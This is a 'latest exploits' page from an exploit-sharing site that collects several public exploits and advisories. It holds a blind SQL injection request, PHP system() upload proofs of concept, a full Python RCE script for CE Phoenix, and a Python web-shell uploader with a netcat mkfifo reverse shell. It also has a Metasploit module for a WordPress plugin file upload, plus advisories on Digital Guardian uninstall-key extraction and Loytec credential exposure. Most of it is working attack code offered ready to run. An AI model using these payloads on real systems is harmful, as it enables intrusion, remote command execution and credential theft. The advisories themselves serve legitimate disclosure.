Latest exploits :: CodePwn

<pre><code># Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection # Date: 13/11/2023 # Exploit Author: BugsBD Limited # Discover by: Rahad Chowdhury # Vendor Homepage: https://www.mayurik.com/ # Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php # Version: v1.0 # Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56 # CVE: CVE-2023-48823 Descriptions: Blind SQL injection in ajax.php in GaatiTrack Courier Management System v1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. Steps to Reproduce: 1. Request: POST /gaatitrack/ajax.php?action=login HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 83 Origin: http://192.168.1.74 Connection: close Referer: http://192.168.1.74/gaatitrack/login.php Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc email=test%40test.com&password=123456 2. Now use blind sqli query after email parameter. So your request data will be: POST /gaatitrack/ajax.php?action=login HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 83 Origin: http://192.168.1.74 Connection: close Referer: http://192.168.1.74/gaatitrack/login.php Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456 ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823) </code></pre>

<pre><code># Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution # Date: 30/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip # Version: 1.6.1 # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS ## POC: 1 ) Login with admin cred and click Add-ons 2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php 3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php 4 ) You will be see id command result Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) ### Post Request: POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1 Host: demos6.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459 Content-Length: 522 Origin: https://demos6.softaculous.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="formtoken" 5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="userfile"; filename="upgrade.php" Content-Type: application/x-php <?php echo system('id'); ?> -----------------------------86020911415982314764024459 Content-Disposition: form-data; name="submit" -----------------------------86020911415982314764024459-- ### Response :   <div class="row" style="overflow:visible"> <div class="fg12"> <table id="former_positioning_table"> <tr> <td class="content"> uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <div class="top alertbox_error fg12 error-box"> Invalid WBCE CMS language file. Please check the text file. <a href="index.php" class="button">Back </code></pre>

<pre><code>## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ## EXPLOIT : import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' def entry_banner(): color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """ for char in banner: print(char, end='') sys.stdout.flush() sleep(0.0045) def get_formid_and_cookies(session, url): response = session.get(url, allow_redirects=True) if response.ok: soup = BeautifulSoup(response.text, 'html.parser') formid_input = soup.find('input', {'name': 'formid'}) if formid_input: return formid_input['value'], session.cookies return None, None def perform_exploit(session, url, username, password, command): print("\n[+] Attempting to exploit the target...") initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php" formid, cookies = get_formid_and_cookies(session, initial_url) if not formid: print("[-] Failed to retrieve initial formid.") return # Login print("[+] Performing login...") login_payload = { 'formid': formid, 'username': username, 'password': password } login_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': initial_url } login_url = url + "/admin/login.php?action=process" login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True) if not login_response.ok: print("[-] Login failed.") print(login_response.text) return print("[+] Login successful.") new_formid, _ = get_formid_and_cookies(session, login_response.url) if not new_formid: print("[-] Failed to retrieve new formid after login.") return # Exploit print("[+] Executing the exploit...") encoded_command = urllib.parse.quote_plus(command) exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B" exploit_headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36', 'Referer': login_response.url } exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save" exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True) if exploit_response.ok: print("[+] Exploit executed successfully.") else: print("[-] Exploit failed.") print(exploit_response.text) final_response = session.get(url) print("\n[+] Executed Command Output:\n") print(final_response.text) def main(base_url, username, password, command): print("\n[+] Starting the exploitation process...") session = requests.Session() perform_exploit(session, base_url, username, password, command) if __name__ == "__main__": entry_banner() if len(sys.argv) < 5: print("Usage: python script.py [URL] [username] [password] [command]") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] command = sys.argv[4] main(base_url, username, password, command) </code></pre>

<pre><code>#!/usr/bin/python3 # Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated) # Date: 28/11/2023 # Exploit Author: Akash Pandey aka l3v1ath0n # Version: <= 1.0 # Tested on: Kali Linux # CVE : CVE-2022-3436 import requests import time import os print(""" ____ ___ ____ ____ _____ _ _ _____ __ _____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_ / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \ | (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) | \___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/ Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️: Twitter: https://twitter.com/_l3v1ath0n Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/ """) web_url = "http://192.168.1.26/student/" # Edit this as per your need username = "18/132010" # Default Username password = "11111111" # Default Password local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell local_port = "1337" # Port of local machine to connect reverse shell on... rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f" # Firing request to login log_url = web_url+"login.php" #Telling script to use previous session session = requests.Session() #Post Body Data for login post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''} #Sending request to web server with required post data response = session.post(log_url,data=post_data) # Checking Login if Successful: time.sleep(1) # Creating a shell file in current directory print("[i] Creating a shell file to upload.") with open("shell.php","w") as file: file.write("<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>") file.close() time.sleep(1) print("[i] Checking Login.") if response.history: print("[+] Login Successful.") time.sleep(1) print("[i] Uploading Shell.") # Step 1: Reads the shell.php file in current folder # Step 2: Stores the content in filename called shell.php # Step 3: Uses the variable name userImage to upload file to server. file = {'userImage':('shell.php',open("shell.php","rb"))} # Sending payload as POST data to shell.php file payload = {'userImage':"<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>",'btnedit':''} # Uploading the malicious php file at below path using files and data values upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload) print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script") while True: command = input("l3v1ath0n㉿CVE-2022-3436: ") if command == "exit": break elif command == "netcat": print("[!] Don't forget to start Netcat Listener") time.sleep(3) payload = {'cmd':rev_shell} cmd = session.get(web_url+"uploads/shell.php?",params=payload) print(cmd.text) else: payload = {'cmd':command} cmd = session.get(web_url+"uploads/shell.php?",params=payload) print(cmd.text) print("\n[i] Closing this Session") session.close() else: print("[-] Login Failed.") </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Royal Elementor Addons RCE', 'Description' => %q{ Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79). }, 'Author' => [ 'Fioravante Souza', # Vulnerability discovery 'Valentin Lobstein' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-5360'], ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'], ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34'] ], 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [['Automatic', {}]], 'DisclosureDate' => '2023-11-23', 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) end def check return CheckCode::Unknown unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79') if check_code.code != 'appears' return CheckCode::Safe end plugin_version = check_code.details[:version] print_good("Detected Royal Elementor Addons version: #{plugin_version}") return CheckCode::Appears end def exploit print_status('Attempting to retrieve nonce...') nonce = retrieve_nonce print_status('Sending payload') uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php') data = { 'action' => 'wpr_addons_upload_file', 'max_file_size' => rand(10001), 'allowed_file_types' => 'ph$p', 'triggering_event' => 'click', 'wpr_addons_nonce' => nonce } file_content = '<?php ' file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));") file_content << '?>' file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p" post_data = Rex::MIME::Message.new post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"") data.each_pair do |key, value| post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"") end res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) unless res fail_with(Failure::Unreachable, 'No response received from the target') end if res.code == 200 && res.body.include?('success') print_good('Payload uploaded successfully') response_data = JSON.parse(res.body) if response_data.key?('data') && response_data['data'].key?('url') file_url = response_data['data']['url'] print_status('Triggering the payload') send_request_cgi({ 'uri' => file_url, 'method' => 'GET' }) else fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response') end else fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') end end def retrieve_nonce res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET') fail_with(Failure::Unreachable, 'No response received from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200 match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/) fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil? nonce = JSON.parse(match[1])['nonce'] fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil? print_good("Nonce found in response: #{nonce.inspect}") nonce end end </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231123-0 > ======================================================================= title: Uninstall Key Caching product: Fortra Digital Guardian Agent Uninstaller (Data Loss Prevention) vulnerable version: Agent: <7.9.4 fixed version: Agent: 7.9.4 CVE number: CVE-2023-6253 impact: High homepage: https://www.fortra.com/product-lines/digital-guardian found: 2023-05-16 by: J. Kruchem (Office Vienna) B. Gründling (Office Vienna) D. Hirschberger (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Digital Guardian is proud to be part of Fortra’s comprehensive cybersecurity portfolio. Fortra simplifies today’s complex cybersecurity landscape by bringing complementary products together to solve problems in innovative ways. These integrated, scalable solutions address the fast-changing challenges you face in safeguarding your organization. With the help of the powerful protection from Digital Guardian and others, Fortra is your relentless ally, here for you every step of the way throughout your cybersecurity journey." Source: https://www.digitalguardian.com/ Business recommendation: ------------------------ SEC Consult recommends users of this platform to install the latest update. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Stored Cross-Site Scripting The "PDF templates" feature is vulnerable against stored cross-site scripting because it allows inserting arbitrary HTML. Therefore, an administrator can create a malicious template which contains JavaScript and can send a link to this template to authenticated users. According to the vendor, this feature works as intended and the associated risk is low, hence it will not be fixed. 2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253) The Agent Uninstaller handles sensitive data insecurely and caches the Uninstall key in memory. This key can be used to stop or uninstall the application. This allows a locally authenticated attacker with administrative privileges to disable the application temporarily or even remove the application from the system completely. Proof of concept: ----------------- 1) Stored Cross-Site Scripting According to the vendor, this feature works as intended and the associated risk is low, hence it will not be fixed. When editing PDF templates in the Digital Guardian Management Console (DGMC) JavaScript code can be injected. By clicking on "preview" the XSS code gets triggered. The "PDF templates" feature can be found in the System -> Configuration menu. Here, a new template can be uploaded, or an existing one can be edited. To exploit the issue, malicious JavaScript can be added to a template: <xss_insert.png> Afterwards, the XSS is executed when the template is previewed with the corresponding button: <xss_trigger.png> The attacker can also send the direct link to the template to the victim: https://DG_HOST/DigitalGuardian/PopUps/PDFTemplatePreview.aspx?name=XSS.htm If a victim opens the link while authenticated, the JavaScript code will be executed. 2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253) When executing the installer of the DG Agent (.msi) the uninstall key is pre-configured and can be read out (e.g. via Debugging). First, the LocalPackage registry hive was identified, which reveals the MSI installation package located in the Windows directory: <registry.png> The file can be executed without local administrator privileges. When executed and clicked "Next", the Uninstall Key is prefilled as can be seen in the following figure: <installer.png> Note: For demonstration purposes and simplification of the proof of concept, the provided administrative access to the management console was used to append a unique string to the uninstall key so it can be found in the memory more efficiently. An attacker can also find the key without this modification. For this purpose, the string "sectest" was appended. WinDbg can be used to extract this key. WinDbg can simply be attached to the process. Afterwards, the execution is paused in WinDbg and the following command is used to search for the unique string: > s -u 0 L?FFFFFFFFFFFFFFFF "sectest" The following figure shows the output of this command (since a very large memory space is searched, "Break" can be used to stop WinDbg from searching). <windbg_1.png> The memory space before "sectest" needs to be viewed to show the uninstall key. The command db 000001c6`165b63a8 can be used to show the memory, as can be seen in the following figure: <windbg_2.png> Thus, the original uninstall key is "dlpuninstall". Furthermore, it can be used with the Terminator.exe found in the following path: "C:\Program Files\[...]\DLP" Running the application and supplying the key via an elevated command prompt, it terminates all agent processes: <terminator.png> This binary can also be used to brute-force the correct Uninstall key, by repeatedly calling it with possible Uninstall key candidates: \.Terminator.exe <key candidate> Vulnerable / tested versions: ----------------------------- The following version has been tested: * Management Console: 8.5.0.0317 * Agent: 7.8.5.0048 The vendor confirmed that all current and previous versions are affected. Vendor contact timeline: ------------------------ 2023-06-12: Contacting vendor through email (info@fortra.com); asking for security contact, no response. 2023-06-26: Contacting vendor through same email again, no response. 2023-07-28: Contacting vendor through a more direct email-channel, no response. 2023-09-14: Sent another email to various email addresses found on the website. Their "security.txt" file only points to inaccessible pages (403 Access denied or 404 for the PGP key). 2023-09-14: Vendor response (Fortra support contact): forwarded our email to Digital Guardian support team. Support team and product security team reply. 2023-09-15: Asked for email encryption, received PGP key. 2023-09-18: Sending encrypted security advisory. 2023-09-19: Confirmation of receipt, team is working on verification and development. 2023-10-11: Asking for status update. Vendor response: XSS could be replicated but functionality works as intended and won't be fixed because of limited exposure. Issue 2 could not be verified yet, but engineering has acknowledged it as addressable. Fix is planned for Q4. All current and previous versions are affected. 2023-10-12: Asking for CVE number and if further input regarding vulnerability 2 is needed, no response. 2023-10-17: Received ticket notification that next maintenance update version 7.9.4 should be available for customer testing in the near future. 2023-11-09: Received ticket notification that version 7.9.4 is now GA for all customers. 2023-11-13: Sending advisory draft to vendor, asking for CVE number for issue 2 again, scheduling advisory release for next week. 2023-11-17: Vendor response, no CVE number yet, we will request one ourselves. 2023-11-23: Public release of security advisory. Solution: --------- The vendor provides an updated Agent version 7.9.4 which can be downloaded at the vendor's support page: https://www.digitalguardian.com/services/support Access controls to the management console along with monitoring and preventive controls are recommended compensating controls for issue 1 according to the vendor. Workaround: ----------- To prevent disclosure of the uninstall key (issue 2) change it immediately after deploying the DG agent on the system. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF J. Kruchem, B. Gründling, D. Hirschberger / @2023 </code></pre>

<pre><code> [+] CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 [+] Title : Multiple vulnerabilities in Loytec L-INX Automation Servers [+] Vendor : LOYTEC electronics GmbH [+] Affected Product(s) : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4 [+] Affected Components : L-INX Automation Servers [+] Discovery Date : 01-Sep-2021 [+] Publication date : 03-Nov-2023 [+] Discovered by : Chizuru Toyama of TXOne networks [Vulnerability Description] CVE-2023-46386 : Insecure Permissions 'registry.xml' file contains hard-coded clear text credentials for smtp client account. If an attacker succeeds in getting registry.xml file, the email account could be compromised. Password should be encrypted. CVE-2023-46387 : Improper Access Control '/var/lib/lgtw/dpal_config.zml' file is accessible via file download API. 'dpal_config.wbx' which is extracted from 'dpal_config.zml' includes sensitive configuration information such as smtp client information. Authentication is required to exploit this vulnerability. http://<IP>:<port>/DT?filename=/var/lib/lgtw/dpal_config.zml CVE-2023-46388 : Insecure Permissions 'dpal_config.wbx' file contains hard-coded clear text credentials for smtp client account. If an attacker succeeds in getting dpal_config.zml file, the email account could be compromised. Password should be encrypted. CVE-2023-46389 : Improper Access Control '/tmp/registry.xml' file is accessible via file download API. 'registry.xml' includes device configuration information which includes sensitive information such as smtp client information. Authentication is required to exploit this vulnerability. http://<IP>:<port>/DT?filename=/tmp/registry.xml [Timeline] 01-Sep-2021 : Vulnerabilities discovered 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response) 07-Oct-2022 : ICS CERT reported to vendor (no response) 03-Nov-2023 : Public Disclosure </code></pre>

<pre><code> [+] CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 [+] Title : Multiple vulnerabilities in Loytec LINX Configurator [+] Vendor : LOYTEC electronics GmbH [+] Affected Product(s) : LINX Configurator 7.4.10 [+] Affected Components : LINX Configurator [+] Discovery Date : 01-Sep-2021 [+] Publication date : 03-Nov-2023 [+] Discovered by : Chizuru Toyama of TXOne networks [Vulnerability Description] CVE-2023-46383 : Insecure Permissions Loytec LINX Configurator could be connected to Loytec devices with an administrator credential, and it could configure device settings. Since it uses HTTP Basic Authentication, which transmits usernames and passwords in base64-encoded cleartext, so anyone could easily steal credentials if they sniff network traffics. Once obtaining the admin password, attackers could connect and control Loytec devices via LINX configurator. CVE-2023-46384 : Insecure Permissions Following registry key contains hard-coded clear text admin password for recently connected Loytec device. (password cache) If an attacker succeeds in getting this registry key value, attackers could connect and control Loytec devices via LINX configurator. Key: Computer\HKEY_CURRENT_USER\SOFTWARE\LOYTEC\LOYTEC LINX Configurator\OhioIni Value name: ftp_pass Value dada: <admin password> CVE-2023-46385 : Insecure Permissions When Loytec LINX Configurator connects to a device, it sends HTTP GET request to login. Since cleartext password is passed as an URL parameter, "password" without sufficient protection, anyone could easily steal credentials if they sniff network traffics. Once obtaining the admin password, attackers could connect and control Loytec devices via LINX configurator. http://<IP>:<port>/webui/config/system?username=admin&password=<admin password>&login=Login [Timeline] 01-Sep-2021 : Vulnerabilities discovered 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response) 07-Oct-2022 : ICS CERT reported to vendor (no response) 03-Nov-2023 : Public Disclosure </code></pre>